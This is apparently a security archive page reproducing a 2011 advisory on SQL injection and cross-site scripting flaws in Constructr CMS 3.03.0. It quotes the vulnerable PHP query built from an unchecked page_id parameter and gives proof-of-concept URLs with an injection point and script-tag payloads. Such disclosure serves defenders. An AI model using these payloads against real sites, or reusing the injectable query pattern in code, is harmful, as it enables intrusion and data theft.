Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection

Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection: Posted Mar 11, 2011; Authored by LiquidWorm | Site zeroscience.mk; Constructr CMS version 3.03 suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | a4224d4b86b1a571f0f86d7e8a69d82fa301a58aad20b4eff53030bccf77f96d; Download | Favorite | View

Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection


Constructr CMS 3.03 Miltiple Remote Vulnerabilities (XSS/SQLi)


Vendor: phaziz interface design
Product web page: http://www.constructr-cms.org
Affected version: 3.03.0

Summary: ConstructrCMS is a new and fresh Content Management
System build with the Power of PHP and MySQL. The Backend is
mostly controlled by Ajax for a unique User Experience.

Desc: The CMS suffers from several vulnerabilities (SQL and XSS).
The sql issue can be triggered when the app tries to parse malicious
arguments to the 'page_id' in the /xmlOutput/constructrXmlOutput.content.xml.php
script with user input not validated. The result can be seen in the source
code of the page itself. The xss issue (GET) is thru 'user' and 'hash' parameter in
the /backend/login.php script.

-------------------------------------------------------------------

32: $PAGE_ID = $_REQUEST['page_id'];
...
40:    $select_content = $conContent -> query("
41:           SELECT *
42:           FROM $DB_TABLE_CONSTRUCTR_CONTENT
43:           WHERE page_id = '$PAGE_ID'
44:           ORDER BY sort ASC
45:    ")or die(mysql_error());
...
51:      while ($all_content = $conContent -> fetch_array($select_content))
52:      {
53:           $id            = $all_content['id'];
54:           $page_id       = $all_content['page_id'];
...

-------------------------------------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41 

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com


Advisory ID: ZSL-2011-5001
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5001.php


10.03.2011


PoC:

[SQL] http://constructr/xmlOutput/constructrXmlOutput.content.xml.php?page_id='[INJECT POINT];--";--

[XSS] http://constructr/backend/login.php?installed=101&no_user_rights=101&login_first_echo=101&already_logged_in=101&login_user_deactivated=101&login_failed=101&login_success=101&nosaltnpepper=101&user=101<script>alert(2)</script>&hash=101<script>alert(2)</script>

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 98 files
indoushka 37 files
Gentoo 29 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,560)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,418)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,704)
UNIX (9,432)
UnixWare (187)
Windows (6,668)
Other

Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection

Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection

Share This

Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems